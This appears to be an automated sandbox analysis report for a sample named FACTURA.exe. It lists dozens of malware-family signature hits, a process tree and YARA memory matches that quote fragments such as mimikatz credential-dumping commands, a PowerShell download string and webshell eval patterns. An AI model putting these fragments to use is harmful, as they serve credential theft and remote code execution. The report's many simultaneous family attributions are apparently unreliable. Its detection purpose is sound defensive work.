Play interactive tour

Edit tour

Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name:	FACTURA.exe
Analysis ID:	1568
MD5:	740463ed3266f7aee8331978f50c731c
SHA1:	a9310948476693d72be937f23e1b53b3607bf92f
SHA256:	fa9e12a03b909482d5bacd2d7ab1a8d672528bfcf43402c04b6d3a30702b0c4d
Infos:
Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Remcos AESCRYPT Ransomware Annabelle

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected PasteDownloader

Yara detected LaZagne password dumper

Yara detected Metasploit Payload

Yara detected LazParking Ransomware

Yara detected Neshta

Detected Hacktool Mimikatz

Yara detected Discord Token Stealer

Yara detected MailPassView

Yara detected BlackMoon Ransomware

Yara detected Snake Keylogger

Yara detected Parallax RAT

Yara detected Zeppelin Ransomware

Yara detected Ragnarok ransomware

Yara detected Apis Ransomware

Yara detected Wannacry ransomware

Yara detected MegaCortex Ransomware

Yara detected Valak

Yara detected AntiVM3

Yara detected Cobra Locker ransomware

Yara detected RekenSom ransomware

Yara detected Avaddon Ransomware

Yara detected Babuk Ransomware

Yara detected Nemty Ransomware

Yara detected NetWire RAT

Yara detected Linux EvilGnome RC5 key

Yara detected Mini RAT

Yara detected BLACKMatter Ransomware

Yara detected Clay Ransomware

Yara detected Thanos ransomware

Yara detected Koadic

Yara detected Jigsaw

Yara detected CryLock ransomware

Yara detected Pony

Yara detected Sapphire Ransomware

Yara detected OCT Ransomware

Yara detected Snatch Ransomware

Yara detected VBKeyloggerGeneric

Antivirus detection for URL or domain

Yara detected AESCRYPT Ransomware

Yara detected RansomwareGeneric

Yara detected Silvertor Ransomware

Yara detected Coinhive miner

Yara detected Ouroboros ransomware

Yara detected Annabelle Ransomware

Yara detected Gocoder ransomware

Detected Imminent RAT

Yara detected LimeRAT

Yara detected BitCoin Miner

Yara detected WannaRen ransomware

Yara detected GuLoader

Yara detected Chaos Ransomware

Yara detected Hancitor

Found malware configuration

Yara detected Mock Ransomware

Yara detected Conti ransomware

Yara detected Generic Dropper

Yara detected NoCry Ransomware

Yara detected ByteLocker Ransomware

Yara detected RegretLocker Ransomware

Yara detected Meterpreter

Yara detected Clop Ransomware

Yara detected Ryuk ransomware

Yara detected Xmrig cryptocurrency miner

Yara detected Porn Ransomware

Yara detected LockBit ransomware

Yara detected DarkSide Ransomware

Yara detected LOCKFILE ransomware

Malicious sample detected (through community Yara rule)

Yara detected Cerber ransomware

Yara detected HiddenTear ransomware

Yara detected Telegram RAT

Yara detected Rhino ransomware

Yara detected Mailto ransomware

Yara detected CoronaCrypt Ransomware

Yara detected Voidcrypt Ransomware

Yara detected Njrat

Yara detected Buran Ransomware

Yara detected GoGoogle ransomware

Yara detected VHD ransomware

Yara detected generic Shellcode Injector

Yara detected Axiom Ransomware

Yara detected Artemon Ransomware

Yara detected Netwalker ransomware

Yara detected Vidar stealer

Yara detected Jcrypt Ransomware

Yara detected Covid19 Ransomware

Yara detected UACMe UAC Bypass tool

Yara detected Delta Ransomware

Yara detected Predator

Yara detected Mimikatz

Detected HawkEye Rat

Yara detected AveMaria stealer

Yara detected Nukesped

Yara detected LokiLocker Ransomware

Detected Remcos RAT

Yara detected Cryptolocker ransomware

Yara detected Marvel Ransomware

Multi AV Scanner detection for domain / URL

Yara detected Codoso Ghost

Yara detected Cute Ransomware

Yara detected Growtopia

Yara detected Xorist ransomware

Yara detected Windows Security Disabler

Yara detected Dorkbot

Yara detected RevengeRAT

Contains VNC / remote desktop functionality (version string found)

Found strings related to Crypto-Mining

Found Tor onion address

Yara detected MaliciousMacro

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Sample is not signed and drops a device driver

May modify the system service descriptor table (often done to hook functions)

Yara detected AllatoriJARObfuscator

Found many strings related to Crypto-Wallets (likely being stolen)

Found potential ransomware demand text

Found string related to ransomware

Yara detected MSILLoadEncryptedAssembly

Yara detected VB6 Downloader Generic

Contains functionality to hide user accounts

Yara detected BatToExe compiled binary

May drop file containing decryption instructions (likely related to ransomware)

Binary or sample is protected by dotNetProtector

May enable test signing (to load unsigned drivers)

Deletes shadow drive data (may be related to ransomware)

Yara detected Autohotkey Downloader Generic

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Sample execution stops while process was sleeping (likely an evasion)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Creates driver files

Binary contains a suspicious time stamp

May initialize a security null descriptor

Yara detected Keylogger Generic

Uses 32bit PE files

Yara signature match

Deletes files inside the Windows folder

Contains functionality to query the security center for anti-virus and firewall products

Creates files inside the system directory

May infect USB drives

PE file contains sections with non-standard names

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Yara detected RemCom RemoteAdmin tool

PE file contains executable resources (Code or Archives)

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains strings related to BOT control commands

Enables security privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Yara detected Winexe tool

Classification

Process Tree

System is w10x64native

FACTURA.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 740463ED3266F7AEE8331978F50C731C)

WerFault.exe (PID: 8016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848 MD5: 40A149513D721F096DDF50C04DA2F01F)

WerFault.exe (PID: 2516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 856 MD5: 40A149513D721F096DDF50C04DA2F01F)

UserOOBEBroker.exe (PID: 2888 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

mpam-5e107659.exe (PID: 6940 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe' /q WD MD5: 58454E5B478373BF68420AE5D49380D4)

MpSigStub.exe (PID: 5556 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)

wevtutil.exe (PID: 4104 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wevtutil.exe (PID: 6840 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)

conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mpam-fad3e9a8.exe (PID: 1248 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-fad3e9a8.exe MD5: 34B7B3BDFA61E18D3B2C3B0AC92B78EF)

cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Execute Command", "Command": "\u0001"}

Threatname: CryLock

{"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api  Intel(R) Core(TM)2 CPU         T7200  @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x2f5af:$a: Cookies: Sym1.0 0x2f550:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0xf57f:$x1: zxplug -add 0xf58b:$x2: getxxx c:\xyz.dll
00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xd5e:$opbs48: se'.(32*2) 0x179f:$php_short: <? 0x184cc:$php_short: <? 0x179f:$php_new2: <?php
00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x8238:$: \\.\pipe\%s%s%d
00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1ce01:$opbs73: eval(str_rot13( 0x6525:$php_short: <? 0xf324:$php_short: <? 0x1f6db:$php_short: <? 0x33597:$php_short: <? 0x33ae7:$php_short: <? 0x37c06:$php_short: <? 0x6525:$php_new1: <?=$
00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x23b4a:$s1: .CreateObject("WScript.Shell") 0x20175:$p1: powershell.exe 0x20c53:$p1: powershell.exe 0x23b7b:$p1: powershell.exe
00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x2c897:$s3: hhhhh.exe 0x2c881:$s4: ttttt.exe 0x2c86b:$s6: cle.log.1
00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2abc1:$s1: stratum+tcp:// 0x2ac01:$s1: stratum+tcp://
00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xa3d8:$a: Amplia Security 0xa4a5:$e: extract the TGT session key
00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x47e1:$payload_and_input1: eval(request[ 0x7d16:$tagasp_short1: <%@ 0x7d3b:$tagasp_short1: <%v 0x2f464:$tagasp_short1: <%\xEF 0x7d39:$tagasp_short2: %> 0x1a769:$tagasp_short2: %> 0x316c3:$tagasp_short2: %> 0x34885:$tagasp_short2: %> 0x3af14:$tagasp_short2: %> 0x7d16:$tagasp_long20: <%@pagelanguage="jscript
00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x45ed:$s1: stratum+tcp://
00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x23a78:$cUp: Upload failed! [Remote error code:
00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x164fe:$new_php2: <?php 0x16f20:$new_php2: <?php 0x16503:$dynamic1: $_system($ 0x1715:$gen_bit_sus47: Shell 0x1a08:$gen_bit_sus47: Shell 0x2062:$gen_bit_sus47: Shell 0x33f6:$gen_bit_sus47: Shell 0x3420:$gen_bit_sus47: Shell 0x344a:$gen_bit_sus47: Shell 0x347c:$gen_bit_sus47: Shell 0x34bc:$gen_bit_sus47: Shell 0x3500:$gen_bit_sus47: Shell 0x15d9d:$gen_bit_sus47: Shell 0x5c83:$gen_bit_sus50: bypass 0x148dd:$gen_bit_sus61: /bin/sh 0x15d4d:$gen_much_sus8: Webshell 0x16289:$gen_much_sus8: webshell 0x16bab:$gen_much_sus8: WebShell 0x16f0b:$gen_much_sus8: WebShell 0x2ef0a:$gen_much_sus8: WebShell 0x1dfdb:$gen_much_sus15: Antivirus
00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6336234827.00000197A31B6000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33807:$x1: 78 34 4E 54 64 63 65 44 55 7A 58 48 67 0x33817:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x1871e:$x3: lsadump::dcsync
00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x3c3cd:$s2: system.net.webclient).downloadstring('http
00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x187e7:$s5: sekurlsa::tspkg 0x187a4:$s13: sekurlsa::ekeys 0x18761:$s14: sekurlsa::dpapi
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x70b2:$payload7: eval(base64_decode( 0x70ad:$php_short: <? 0x89aa:$php_short: <? 0x9a89:$php_short: <? 0x14c27:$php_short: <? 0x89aa:$php_new1: <?=$ 0x70ad:$php_new2: <?php 0x9a89:$php_new2: <?php
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x70ad:$new_php2: <?php 0x9a89:$new_php2: <?php 0xaffb:$dynamic1: $split[stringlen($ 0xa01d:$gen_bit_sus11: "cmd.exe 0x1df34:$gen_bit_sus11: "cmd.exe 0x9811:$gen_bit_sus50: bypass 0x7097:$gen_much_sus8: Webshell 0x8b88:$gen_much_sus8: Webshell 0xaba5:$gen_much_sus8: WebShell 0xabf8:$gen_much_sus8: WebShell 0x1bc0b:$gen_much_sus8: Webshell 0x1bee5:$gen_much_sus8: Webshell 0x1dcc2:$gen_much_sus8: webshell 0x97fc:$gen_much_sus15: antivirus 0x1e505:$gen_much_sus18: "unsafe 0x85aa:$gen_much_sus25: Exploit 0x8e6d:$gen_much_sus25: Exploit 0x9156:$gen_much_sus25: Exploit 0x9d04:$gen_much_sus25: Exploit 0xa139:$gen_much_sus25: Exploit 0xa380:$gen_much_sus25: Exploit
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x9e1a:$opbs73: eval(str_rot13( 0x70ad:$php_short: <? 0x89aa:$php_short: <? 0x9a89:$php_short: <? 0x14c27:$php_short: <? 0x89aa:$php_new1: <?=$ 0x70ad:$php_new2: <?php 0x9a89:$php_new2: <?php
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x1e4ed:$payload_and_input1: eval(request. 0x818e:$tagasp_short1: <%@ 0x1e4d0:$tagasp_short1: <%@ 0x1e4eb:$tagasp_short1: <%e 0x81b6:$tagasp_short2: %> 0x126b9:$tagasp_short2: %> 0x1e4e9:$tagasp_short2: %> 0x1e50f:$tagasp_short2: %> 0x1e4eb:$tagasp_long13: <%ev 0x1e4d0:$tagasp_long20: <%@pagelanguage="jscript 0x1c1f4:$jsp4: public
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x7097:$asp_much_sus8: Webshell 0x8b88:$asp_much_sus8: Webshell 0xaba5:$asp_much_sus8: WebShell 0xabf8:$asp_much_sus8: WebShell 0x1bc0b:$asp_much_sus8: Webshell 0x1bee5:$asp_much_sus8: Webshell 0x1dcc2:$asp_much_sus8: webshell 0x97fc:$asp_much_sus15: antivirus 0x1e505:$asp_much_sus18: "unsafe 0xab6f:$asp_much_sus33: hacker 0xa01d:$asp_gen_sus11: "cmd.exe 0x1df34:$asp_gen_sus11: "cmd.exe 0x84e2:$asp_gen_obf1: "+" 0x84e9:$asp_gen_obf1: "+" 0xa15c:$asp_gen_obf1: "+" 0xa160:$asp_gen_obf1: "+" 0xa165:$asp_gen_obf1: "+" 0xa16a:$asp_gen_obf1: "+" 0xa16e:$asp_gen_obf1: "+" 0xa172:$asp_gen_obf1: "+" 0xa177:$asp_gen_obf1: "+"
00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x1e175:$payload2: eval(gzinflate(base64_decode( 0x1acb:$php_short: <? 0x24e2:$php_short: <? 0x24f6:$php_short: <? 0x19a9f:$php_short: <? 0x1d0ff:$php_short: <? 0x3c44d:$php_short: <? 0x3c49b:$php_short: <? 0x3c44d:$php_new2: <?php 0x3c49b:$php_new2: <?php
00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x3c44d:$new_php2: <?php 0x3c49b:$new_php2: <?php 0x3c452:$dynamic1: $_system($ 0x1bda7:$dynamic5: $__() 0x3b2fa:$gen_bit_sus11: "cmd.exe 0x22898:$gen_bit_sus12: %comspec% 0xa23e:$gen_bit_sus46: shell_ 0xa291:$gen_bit_sus46: shell_ 0x3dffc:$gen_bit_sus47: Shell 0x1c67a:$gen_bit_sus50: bypass 0x1c730:$gen_bit_sus50: bypass 0x1b2ac:$gen_bit_sus55: e'.'v 0x1b2b0:$gen_bit_sus55: v'.'a 0x1b2b4:$gen_bit_sus55: a'.'l 0x1b2c4:$gen_bit_sus55: z'.'i 0x1b2c9:$gen_bit_sus55: n'.'f 0x1b2cd:$gen_bit_sus55: f'.'l 0x1dd42:$gen_bit_sus56: m"."d 0x1dd48:$gen_bit_sus56: e"."x 0x1c93b:$gen_bit_sus59: 'cmd' 0x30bdb:$gen_bit_sus62: Cyber
00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1b2ac:$opbs18: e'.'v'.'a'.'l 0x1acb:$php_short: <? 0x24e2:$php_short: <? 0x24f6:$php_short: <? 0x19a9f:$php_short: <? 0x1d0ff:$php_short: <? 0x3c44d:$php_short: <? 0x3c49b:$php_short: <? 0x3c44d:$php_new2: <?php 0x3c49b:$php_new2: <?php
00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1d692:$s1: stratum+tcp://
00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x1f536:$: \\.\pipe\%s%s%d
00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1ce01:$opbs73: eval(str_rot13( 0x6525:$php_short: <? 0xf324:$php_short: <? 0x1f6db:$php_short: <? 0x33597:$php_short: <? 0x33ae7:$php_short: <? 0x37c06:$php_short: <? 0x6525:$php_new1: <?=$
00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x82eb:$s1: stratum+tcp:// 0x2752e:$s1: stratum+tcp://
00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x1ad5b:$x3: lsadump::dcsync
00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x1acec:$s1: sekurlsa::msv 0x1acd6:$s2: sekurlsa::wdigest 0x1acab:$s4: sekurlsa::kerberos 0x1ac52:$s5: sekurlsa::tspkg 0x1ac3c:$s6: sekurlsa::livessp 0x1ac2a:$s7: sekurlsa::ssp 0x1ac14:$s9: sekurlsa::process 0x1ac7c:$s11: sekurlsa::pth 0x1ac66:$s12: sekurlsa::tickets 0x1acc2:$s13: sekurlsa::ekeys 0x1abcf:$s14: sekurlsa::dpapi 0x1abb9:$s15: sekurlsa::credman
00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x55af:$s1: stratum+tcp://
00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
